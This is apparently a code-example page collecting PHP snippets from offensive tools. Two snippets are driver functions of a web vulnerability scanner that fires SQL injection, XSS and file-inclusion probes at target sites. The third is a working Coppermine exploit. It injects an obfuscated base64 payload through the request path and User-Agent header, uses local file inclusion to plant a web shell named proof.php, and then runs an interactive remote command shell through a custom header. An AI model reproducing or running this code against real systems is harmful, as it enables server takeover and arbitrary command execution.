function full($site)
{
    print "[-] Start full scanning mode.\n";
    pmapwn($site, 1);
    print "[-] Start SQL Injection Scan\n";
    sql($site, 1);
    print "[-] Start XSS Scan\n";
    xss($site, 1);
    print "[-] Start RFI Scan\n";
    rfi($site, 1);
    print "[-] Start LFI Scan\n";
    lfi($site, 1);
}
Exemplo n.º 2
0
function scan()
{
    print "\n  Options:\n";
    print "    sqli - SQL Injection\n";
    print "    xss - Cross Site Scripting\n";
    print "    lfi - Local File Inclusion\n";
    print "    rfi - Remote File Inclusion\n";
    print "    all - F**k shit up\n";
    print "     What: ";
    $choice = fopen("php://stdin", "r");
    $what = fgets($choice);
    print "\n File: ";
    $choicef = fopen("php://stdin", "r");
    $whatf = fgets($choicef);
    $whatf = trim($whatf);
    if (file_exists('out/' . $whatf)) {
        if (trim($what) == 'sqli' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
            print "\n\n - Testing SQL Injection for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
            $urls = file('out/' . $whatf);
            foreach ($urls as $link) {
                sqli(urldecode($link));
            }
        }
        if (trim($what) == 'xss' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
            print "\n\n - Testing Cross Site Scripting for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
            $urls = file('out/' . $whatf);
            foreach ($urls as $link) {
                xss(urldecode($link));
            }
        }
        if (trim($what) == 'lfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
            print "\n\n - Testing Local File Inclusion for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
            $urls = file('out/' . $whatf);
            foreach ($urls as $link) {
                lfi(urldecode($link));
            }
        }
        if (trim($what) == 'rfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
            print "\n\n - Testing Remote File Inclusion for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
            $urls = file('out/' . $whatf);
            foreach ($urls as $link) {
                rfi(urldecode($link));
            }
        }
    } else {
        print "\nFile doesnt exist!\n";
    }
}
Exemplo n.º 3
0
    die;
}
$host = $argv[1];
$path = $argv[2];
get_info();
print "\n[-] Version..........: {$version}";
print "\n[-] Cookie name......: {$cookie}";
print "\n[-] Path disclosure..: {$path_disc}\n\n";
if (first_time()) {
    $code = base64_decode("PD9waHA7JGY9Zm9wZW4oY2hyKDExMikuY2hyKDExNCkuY2hyKDExMSkuY2hyKDExMSkuY2hyKDEwMikuY2hyKDQ2KS5jaHIoM" . "TEyKS5jaHIoMTA0KS5jaHIoMTEyKSxjaHIoMTE5KSk7ZndyaXRlKCRmLGNocig2MCkuY2hyKDYzKS5jaHIoMTEyKS5jaHIoMT" . "A0KS5jaHIoMTEyKS5jaHIoMzIpLmNocigxMDEpLmNocig5OSkuY2hyKDEwNCkuY2hyKDExMSkuY2hyKDMyKS5jaHIoMzkpLmN" . "ocig5NSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTUpLmNocigzOSkuY2hyKDU5KS5jaHIoMzIp" . "LmNocigxMTIpLmNocig5NykuY2hyKDExNSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDEwNCkuY2hyKDExNCkuY2hyKDExNykuY" . "2hyKDQwKS5jaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuY2hyKDEwMC" . "kuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoNDApLmNocigzNikuY2hyKDk1KS5jaHI" . "oODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKS5jaHIoOTEpLmNocigzOSkuY2hyKDcyKS5jaHIo" . "ODQpLmNocig4NCkuY2hyKDgwKS5jaHIoOTUpLmNocig2NykuY2hyKDc3KS5jaHIoNjgpLmNocigzOSkuY2hyKDkzKS5jaHIoN" . "DEpLmNocig0MSkuY2hyKDU5KS5jaHIoMzIpLmNocig2MykuY2hyKDYyKSk7ZmNsb3NlKCRmKTtkaWUoX0xmSV8pOz8+");
    $packet = "GET {$path}{$code} HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "User-Agent: {$code}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    http_send($host, $packet);
    if (!lfi()) {
        die("\n[-] Exploit failed...\n");
    }
}
while (1) {
    print "\ncoppermine-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}proof.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        list($header, $payload) = explode("_code_", http_send($host, $packet));
        preg_match("/200 OK/", $header) ? print "\n{$payload}" : die("\n[-] Exploit failed...\n");
    } else {
        break;